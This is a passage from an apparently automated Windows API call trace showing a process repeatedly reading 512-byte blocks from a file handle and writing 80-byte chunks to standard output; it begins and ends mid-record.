lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.085] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.085] GetFileType (hFile=0x50) returned 0x1 [0193.085] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.085] WriteFile (in: hFile=0x50, lpBuffer=0x30efdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30efdc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.085] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.085] GetFileType (hFile=0x50) returned 0x1 [0193.086] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.086] WriteFile (in: hFile=0x50, lpBuffer=0x30f02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f02c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.086] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.086] GetFileType (hFile=0x50) returned 0x1 [0193.086] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.086] WriteFile (in: hFile=0x50, lpBuffer=0x30f07c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f07c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.086] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.086] GetFileType (hFile=0x50) returned 0x1 [0193.086] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.086] WriteFile (in: hFile=0x50, lpBuffer=0x30f0cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f0cc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.086] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.086] GetFileType (hFile=0x50) returned 0x1 [0193.086] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.086] WriteFile (in: hFile=0x50, lpBuffer=0x30f11c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f11c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.086] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.086] GetFileType (hFile=0x50) returned 0x1 [0193.086] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.086] WriteFile (in: hFile=0x50, lpBuffer=0x30f16c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f16c*, lpNumberOfBytesWritten=0x30e170*=0x20, lpOverlapped=0x0) returned 1 [0193.086] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.086] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e15c | out: lpNewFilePointer=0x0) returned 1 [0193.086] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.086] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.086] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.086] GetFileType (hFile=0x50) returned 0x1 [0193.086] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.086] GetFileType (hFile=0x50) returned 0x1 [0193.086] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.086] WriteFile (in: hFile=0x50, lpBuffer=0x30ef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.086] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.086] GetFileType (hFile=0x50) returned 0x1 [0193.087] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.087] WriteFile (in: hFile=0x50, lpBuffer=0x30efdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30efdc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.087] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.087] GetFileType (hFile=0x50) returned 0x1 [0193.087] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.087] WriteFile (in: hFile=0x50, lpBuffer=0x30f02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f02c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.087] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.087] GetFileType (hFile=0x50) returned 0x1 [0193.087] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.087] WriteFile (in: hFile=0x50, lpBuffer=0x30f07c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f07c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.087] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.087] GetFileType (hFile=0x50) returned 0x1 [0193.087] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.087] WriteFile (in: hFile=0x50, lpBuffer=0x30f0cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f0cc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.087] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.087] GetFileType (hFile=0x50) returned 0x1 [0193.087] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.087] WriteFile (in: hFile=0x50, lpBuffer=0x30f11c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f11c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.087] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.087] GetFileType (hFile=0x50) returned 0x1 [0193.087] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.087] WriteFile (in: hFile=0x50, lpBuffer=0x30f16c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f16c*, lpNumberOfBytesWritten=0x30e170*=0x20, lpOverlapped=0x0) returned 1 [0193.087] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.087] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e15c | out: lpNewFilePointer=0x0) returned 1 [0193.087] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.087] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.087] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.087] GetFileType (hFile=0x50) returned 0x1 [0193.087] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.087] GetFileType (hFile=0x50) returned 0x1 [0193.087] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.087] WriteFile (in: hFile=0x50, lpBuffer=0x30ef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.088] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.088] GetFileType (hFile=0x50) returned 0x1 [0193.088] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.088] WriteFile (in: hFile=0x50, lpBuffer=0x30efdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30efdc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.089] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.089] GetFileType (hFile=0x50) returned 0x1 [0193.089] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.089] WriteFile (in: hFile=0x50, lpBuffer=0x30f02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f02c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.089] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.090] GetFileType (hFile=0x50) returned 0x1 [0193.090] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.090] WriteFile (in: hFile=0x50, lpBuffer=0x30f07c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f07c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.090] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.090] GetFileType (hFile=0x50) returned 0x1 [0193.090] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.090] WriteFile (in: hFile=0x50, lpBuffer=0x30f0cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f0cc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.090] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.090] GetFileType (hFile=0x50) returned 0x1 [0193.090] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.090] WriteFile (in: hFile=0x50, lpBuffer=0x30f11c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f11c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.090] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.090] GetFileType (hFile=0x50) returned 0x1 [0193.090] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.090] WriteFile (in: hFile=0x50, lpBuffer=0x30f16c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f16c*, lpNumberOfBytesWritten=0x30e170*=0x20, lpOverlapped=0x0) returned 1 [0193.090] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.090] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e15c | out: lpNewFilePointer=0x0) returned 1 [0193.090] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.090] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.090] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.090] GetFileType (hFile=0x50) returned 0x1 [0193.090] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.090] GetFileType (hFile=0x50) returned 0x1 [0193.090] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.090] WriteFile (in: hFile=0x50, lpBuffer=0x30ef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.090] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.090] GetFileType (hFile=0x50) returned 0x1 [0193.090] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.090] WriteFile (in: hFile=0x50, lpBuffer=0x30efdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30efdc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.091] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.091] GetFileType (hFile=0x50) returned 0x1 [0193.091] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.091] WriteFile (in: hFile=0x50, lpBuffer=0x30f02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f02c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.091] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.091] GetFileType (hFile=0x50) returned 0x1 [0193.091] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.091] WriteFile (in: hFile=0x50, lpBuffer=0x30f07c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f07c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.091] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.091] GetFileType (hFile=0x50) returned 0x1 [0193.091] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.091] WriteFile (in: hFile=0x50, lpBuffer=0x30f0cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f0cc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.091] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.091] GetFileType (hFile=0x50) returned 0x1 [0193.091] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.091] WriteFile (in: hFile=0x50, lpBuffer=0x30f11c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f11c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.091] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.091] GetFileType (hFile=0x50) returned 0x1 [0193.091] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.091] WriteFile (in: hFile=0x50, lpBuffer=0x30f16c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f16c*, lpNumberOfBytesWritten=0x30e170*=0x20, lpOverlapped=0x0) returned 1 [0193.091] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.091] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e15c | out: lpNewFilePointer=0x0) returned 1 [0193.091] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.091] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.091] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.091] GetFileType (hFile=0x50) returned 0x1 [0193.091] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.091] GetFileType (hFile=0x50) returned 0x1 [0193.091] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.091] WriteFile (in: hFile=0x50, lpBuffer=0x30ef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.091] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.091] GetFileType (hFile=0x50) returned 0x1 [0193.091] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.091] WriteFile (in: hFile=0x50, lpBuffer=0x30efdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30efdc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.092] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.092] GetFileType (hFile=0x50) returned 0x1 [0193.092] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.092] WriteFile (in: hFile=0x50, lpBuffer=0x30f02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f02c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.092] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.092] GetFileType (hFile=0x50) returned 0x1 [0193.092] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.092] WriteFile (in: hFile=0x50, lpBuffer=0x30f07c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f07c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.092] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.092] GetFileType (hFile=0x50) returned 0x1 [0193.092] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.092] WriteFile (in: hFile=0x50, lpBuffer=0x30f0cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f0cc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.092] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.092] GetFileType (hFile=0x50) returned 0x1 [0193.092] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.092] WriteFile (in: hFile=0x50, lpBuffer=0x30f11c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f11c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.092] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.092] GetFileType (hFile=0x50) returned 0x1 [0193.092] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.092] WriteFile (in: hFile=0x50, lpBuffer=0x30f16c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f16c*, lpNumberOfBytesWritten=0x30e170*=0x20, lpOverlapped=0x0) returned 1 [0193.092] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.092] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e15c | out: lpNewFilePointer=0x0) returned 1 [0193.092] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.092] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.092] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.092] GetFileType (hFile=0x50) returned 0x1 [0193.092] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.092] GetFileType (hFile=0x50) returned 0x1 [0193.092] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.092] WriteFile (in: hFile=0x50, lpBuffer=0x30ef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.092] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.093] GetFileType (hFile=0x50) returned 0x1 [0193.093] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.093] WriteFile (in: hFile=0x50, lpBuffer=0x30efdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30efdc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.093] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.093] GetFileType (hFile=0x50) returned 0x1 [0193.093] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.093] WriteFile (in: hFile=0x50, lpBuffer=0x30f02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f02c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.093] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.093] GetFileType (hFile=0x50) returned 0x1 [0193.093] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.093] WriteFile (in: hFile=0x50, lpBuffer=0x30f07c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f07c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.093] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.093] GetFileType (hFile=0x50) returned 0x1 [0193.093] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.093] WriteFile (in: hFile=0x50, lpBuffer=0x30f0cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f0cc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.093] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.093] GetFileType (hFile=0x50) returned 0x1 [0193.093] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.093] WriteFile (in: hFile=0x50, lpBuffer=0x30f11c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f11c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.093] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.093] GetFileType (hFile=0x50) returned 0x1 [0193.093] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.093] WriteFile (in: hFile=0x50, lpBuffer=0x30f16c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f16c*, lpNumberOfBytesWritten=0x30e170*=0x20, lpOverlapped=0x0) returned 1 [0193.093] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.093] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e15c | out: lpNewFilePointer=0x0) returned 1 [0193.093] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.093] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.093] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.093] GetFileType (hFile=0x50) returned 0x1 [0193.093] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.093] GetFileType (hFile=0x50) returned 0x1 [0193.093] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.093] WriteFile (in: hFile=0x50, lpBuffer=0x30ef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.094] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.094] GetFileType (hFile=0x50) returned 0x1 [0193.094] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.094] WriteFile (in: hFile=0x50, lpBuffer=0x30efdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30efdc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.094] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.094] GetFileType (hFile=0x50) returned 0x1 [0193.094] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.094] WriteFile (in: hFile=0x50, lpBuffer=0x30f02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f02c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.094] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.094] GetFileType (hFile=0x50) returned 0x1 [0193.094] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.094] WriteFile (in: hFile=0x50, lpBuffer=0x30f07c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f07c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.094] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.094] GetFileType (hFile=0x50) returned 0x1 [0193.094] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.094] WriteFile (in: hFile=0x50, lpBuffer=0x30f0cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f0cc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.094] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.094] GetFileType (hFile=0x50) returned 0x1 [0193.094] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.094] WriteFile (in: hFile=0x50, lpBuffer=0x30f11c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f11c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.094] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.094] GetFileType (hFile=0x50) returned 0x1 [0193.094] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.094] WriteFile (in: hFile=0x50, lpBuffer=0x30f16c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f16c*, lpNumberOfBytesWritten=0x30e170*=0x20, lpOverlapped=0x0) returned 1 [0193.094] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.094] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e15c | out: lpNewFilePointer=0x0) returned 1 [0193.094] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.094] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.094] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.094] GetFileType (hFile=0x50) returned 0x1 [0193.094] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.094] GetFileType (hFile=0x50) returned 0x1 [0193.094] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.094] WriteFile (in: hFile=0x50, lpBuffer=0x30ef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.095] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.095] GetFileType (hFile=0x50) returned 0x1 [0193.095] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.095] WriteFile (in: hFile=0x50, lpBuffer=0x30efdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30efdc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.095] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.095] GetFileType (hFile=0x50) returned 0x1 [0193.095] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.095] WriteFile (in: hFile=0x50, lpBuffer=0x30f02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f02c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.095] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.095] GetFileType (hFile=0x50) returned 0x1 [0193.095] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.095] WriteFile (in: hFile=0x50, lpBuffer=0x30f07c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f07c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.095] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.095] GetFileType (hFile=0x50) returned 0x1 [0193.095] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.095] WriteFile (in: hFile=0x50, lpBuffer=0x30f0cc*, 